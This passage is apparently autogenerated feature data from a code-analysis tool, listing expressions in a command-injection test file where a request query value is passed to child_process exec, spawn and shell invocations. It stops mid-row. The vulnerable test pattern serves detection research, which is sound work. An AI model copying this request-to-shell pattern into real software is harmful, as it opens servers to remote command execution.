/bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:54:56:56 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:54:56:56 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:54:56:56 | cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:56:54:56:56 | cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:5:57:6 | cp | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:5:57:6 | cp | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:5:57:6 | cp | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:5:57:6 | cp | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:5:57:6 | cp | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:5:57:12 | cp.spawn | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:5:57:12 | cp.spawn | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:5:57:12 | cp.spawn | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:5:57:12 | cp.spawn | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:5:57:12 | cp.spawn | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:5:57:50 | cp.spaw ... t(cmd)) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:5:57:50 | cp.spaw ... t(cmd)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:5:57:50 | cp.spaw ... t(cmd)) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:5:57:50 | cp.spaw ... t(cmd)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:5:57:50 | cp.spaw ... t(cmd)) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:5:57:50 | exceptional return of cp.spaw ... t(cmd)) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:5:57:50 | exceptional return of cp.spaw ... t(cmd)) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:5:57:50 | exceptional return of cp.spaw ... t(cmd)) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:5:57:50 | exceptional return of cp.spaw ... t(cmd)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:5:57:50 | exceptional return of cp.spaw ... t(cmd)) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:8:57:12 | spawn | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:8:57:12 | spawn | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:8:57:12 | spawn | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:8:57:12 | spawn | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:8:57:12 | spawn | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:14:57:22 | 'cmd.exe' | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:14:57:22 | 'cmd.exe' | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:14:57:22 | 'cmd.exe' | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:14:57:22 | 'cmd.exe' | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:14:57:22 | 'cmd.exe' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:14:57:22 | 'cmd.exe' | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:14:57:22 | 'cmd.exe' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:14:57:22 | 'cmd.exe' | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:14:57:22 | 'cmd.exe' | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:25:57:37 | ['/C', 'foo'] | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:25:57:37 | ['/C', 'foo'] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:25:57:37 | ['/C', 'foo'] | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:25:57:37 | ['/C', 'foo'] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:25:57:37 | ['/C', 'foo'] | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:25:57:44 | ['/C', 'foo'].concat | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:25:57:44 | ['/C', 'foo'].concat | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:25:57:44 | ['/C', 'foo'].concat | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:25:57:44 | ['/C', 'foo'].concat | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:25:57:44 | ['/C', 'foo'].concat | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:25:57:49 | ['/C', ... at(cmd) | CalleeFlexibleAccessPath | cp.spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:25:57:49 | ['/C', ... at(cmd) | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:25:57:49 | ['/C', ... at(cmd) | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:25:57:49 | ['/C', ... at(cmd) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:25:57:49 | ['/C', ... at(cmd) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:25:57:49 | ['/C', ... at(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:25:57:49 | ['/C', ... at(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:25:57:49 | ['/C', ... at(cmd) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:25:57:49 | ['/C', ... at(cmd) | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:25:57:49 | exceptional return of ['/C', ... at(cmd) | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:25:57:49 | exceptional return of ['/C', ... at(cmd) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:25:57:49 | exceptional return of ['/C', ... at(cmd) | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:25:57:49 | exceptional return of ['/C', ... at(cmd) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:25:57:49 | exceptional return of ['/C', ... at(cmd) | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:26:57:29 | '/C' | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:26:57:29 | '/C' | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:26:57:29 | '/C' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:26:57:29 | '/C' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:26:57:29 | '/C' | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:26:57:29 | '/C' | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:26:57:29 | '/C' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:26:57:29 | '/C' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:26:57:29 | '/C' | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:26:57:29 | '/C' | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:32:57:36 | 'foo' | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:32:57:36 | 'foo' | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:32:57:36 | 'foo' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:32:57:36 | 'foo' | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:32:57:36 | 'foo' | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:32:57:36 | 'foo' | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:32:57:36 | 'foo' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:32:57:36 | 'foo' | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:32:57:36 | 'foo' | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:32:57:36 | 'foo' | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:39:57:44 | concat | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:39:57:44 | concat | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:39:57:44 | concat | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:39:57:44 | concat | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:39:57:44 | concat | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:46:57:48 | cmd | CalleeFlexibleAccessPath | ?.concat | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:46:57:48 | cmd | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:46:57:48 | cmd | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:46:57:48 | cmd | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:46:57:48 | cmd | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:46:57:48 | cmd | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:57:46:57:48 | cmd | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:59:6:59:11 | myArgs | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:59:6:59:11 | myArgs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:59:6:59:11 | myArgs | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp execFileSync cmd cp spawn cmd cp spawnSync cmd cp fork cmd cp exec foo cmd bar cp exec foo shell cmd cp exec foo env PATH cmd cp exec foo cwd cmd cp exec foo uid cmd cp exec foo gid cmd sh flag process platform win32 sh cmd.exe flag /c sh /bin/sh flag -c cp spawn sh flag cmd args args 0 0 -c args 1 1 cmd cp execFile /bin/bash args args args 0 0 -c args 1 1 cmd run sh args args args 0 0 - c args 1 1 cmd cp execFile /bin /bash args cp spawn cmd.exe /C foo concat bar cmd cp spawn cmd.exe /C foo concat cmd myArgs myArgs push - c myArgs push cmd cp execFile /bin /bash args | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:59:6:59:11 | myArgs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:59:6:59:11 | myArgs | fileImports | child_process http koa-router my-sub-lib url util webpack-dev-server | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:59:6:59:16 | myArgs | contextFunctionInterfaces | before(app)\nrun(cmd, args) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:59:6:59:16 | myArgs | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/child_process-test.js:59:6:59:16 | myArgs | enclosingFunctionBody | req res cmd url parse req url true query path cp exec foo cp execSync foo cp execFile foo cp execFileSync foo cp spawn foo cp spawnSync foo cp fork foo cp exec cmd cp execSync cmd cp execFile cmd cp 